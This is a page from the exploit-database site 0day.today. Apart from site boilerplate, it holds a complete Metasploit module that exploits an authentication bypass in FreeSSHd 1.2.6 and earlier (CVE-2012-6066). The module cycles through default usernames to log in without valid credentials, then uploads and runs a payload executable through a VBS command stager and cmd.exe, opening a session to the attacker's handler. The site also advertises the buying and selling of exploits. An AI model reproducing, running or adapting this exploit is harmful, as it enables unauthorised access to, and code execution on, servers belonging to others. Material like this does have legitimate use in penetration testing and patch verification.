0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

FreeSSHd 1.2.6 Authentication Bypass Vulnerability

Author

metasploit

Risk

[

Security Risk High

]

0day-ID

Category

Date add

CVE

Platform

require 'msf/core'
require 'tempfile'
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Freesshd Authentication Bypass",
      'Description'    => %q{
          This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass
        authentication. You just need the username (which defaults to root). The exploit
        has been tested with both password and public key authentication.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Aris', # Vulnerability discovery and Exploit
          'kcope', # 2012 Exploit
          'Daniele Martini <cyrax[at]pkcrew.org>' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2012-6066' ],
          [ 'OSVDB', '88006' ],
          [ 'BID', '56785' ],
          [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html' ],
          [ 'URL', 'http://seclists.org/fulldisclosure/2010/Aug/132' ]
        ],
      'Platform'       => 'win',
      'Privileged'     => true,
      'DisclosureDate' => "Aug 11 2010",
      'Targets' =>
        [
          [ 'Freesshd <= 1.2.6 / Windows (Universal)', {} ]
        ],
      'DefaultTarget' => 0
    ))

    register_options(
      [
        OptInt.new('RPORT', [false, 'The target port', 22]),
        OptString.new('USERNAMES',[true,'Space Separate list of usernames to try for ssh authentication','root admin Administrator'])
      ], self.class)
  end

  def load_netssh
    begin
      require 'net/ssh'
      return true
    rescue LoadError
      return false
    end
  end

  def check
    connect
    banner = sock.recv(30)
    disconnect
    if banner =~ /SSH-2.0-WeOnlyDo/
      version=banner.split(" ")[1]
      return Exploit::CheckCode::Vulnerable if version =~ /(2.1.3|2.0.6)/
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end


  def upload_payload(connection)
    exe = generate_payload_exe
    filename = rand_text_alpha(8) + ".exe"
    cmdstager = Rex::Exploitation::CmdStagerVBS.new(exe)
    opts = {
      :linemax => 1700,
      :decoder => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64"),
    }

    cmds = cmdstager.generate(opts)

    if (cmds.nil? or cmds.length < 1)
      print_error("The command stager could not be generated")
      raise ArgumentError
    end
    cmds.each { |cmd|
      ret = connection.exec!("cmd.exe /c "+cmd)
    }

  end

  def setup_ssh_options
    pass=rand_text_alpha(8)
    options={
      :password => pass,
      :port     => datastore['RPORT'],
      :timeout  => 1,
      :proxies  => datastore['Proxies'],
      :key_data => OpenSSL::PKey::RSA.new(2048).to_pem
    }
    return options
  end

  def do_login(username,options)
    print_status("Trying username "+username)
    options[:username]=username

    transport = Net::SSH::Transport::Session.new(datastore['RHOST'], options)
    auth = Net::SSH::Authentication::Session.new(transport, options)
    auth.authenticate("ssh-connection", username, options[:password])
    connection = Net::SSH::Connection::Session.new(transport, options)
    begin
      Timeout.timeout(10) do
        connection.exec!('cmd.exe /c echo')
      end
    rescue  RuntimeError
      return nil
    rescue  Timeout::Error
      print_status("Timeout")
      return nil
    end
    return connection
  end

  def exploit
    #
    # Load net/ssh so we can talk the SSH protocol
    #
    has_netssh = load_netssh
    if not has_netssh
      print_error("You don't have net/ssh installed.  Please run gem install net-ssh")
      return
    end

    options=setup_ssh_options

    connection = nil

    usernames=datastore['USERNAMES'].split(' ')
    usernames.each { |username|
      connection=do_login(username,options)
      break if connection
    }

    if connection
      print_status("Uploading payload. (This step can take up to 5 minutes. But if you are here, it will probably work. Have faith.)")
      upload_payload(connection)
      handler
    end
  end
end

#  0day.today [2024-10-05]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

FreeSSHd 1.2.6 Authentication Bypass Vulnerability

Report Error

Report Error